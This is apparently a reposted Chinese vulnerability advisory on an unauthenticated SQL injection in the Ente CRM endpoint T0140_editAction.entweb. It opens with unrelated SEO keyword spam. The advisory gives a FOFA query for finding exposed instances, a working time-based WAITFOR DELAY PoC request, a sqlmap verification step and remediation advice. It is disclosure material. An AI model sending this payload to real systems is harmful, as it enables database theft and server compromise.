怎么建设自己网站,韩国优秀平面设计网站,上海网络维护找哪家好,网站建设想法0x01 产品简介 浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源#xff0c;提升销售和市场营销的效果。
0x02 漏洞概述 浙大恩特客户资源管理系统中T0140_editAction.entweb接口处存在SQL注入漏洞#xff0c;未…0x01 产品简介 浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源提升销售和市场营销的效果。
0x02 漏洞概述 浙大恩特客户资源管理系统中T0140_editAction.entweb接口处存在SQL注入漏洞未经身份认证的攻击者可以利用该漏洞获取系统数据库敏感信息深入利用可获取服务器权限。
0x03 复现环境
FOFAapp浙大恩特客户资源管理系统 0x04 漏洞复现
PoC
GET /entsoft/T0140_editAction.entweb;.js?methodgetdocumentnumFlagdocumentnum1;WAITFORDELAY0:0:5-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
延时注入 Sqlmap 验证 0x05 修复建议
关闭互联网暴露面设置接口访问控制对用户提交数据信息严格把关多次筛选过滤 对用户数据内容进行加密采用SQL语句预编译和绑定变量
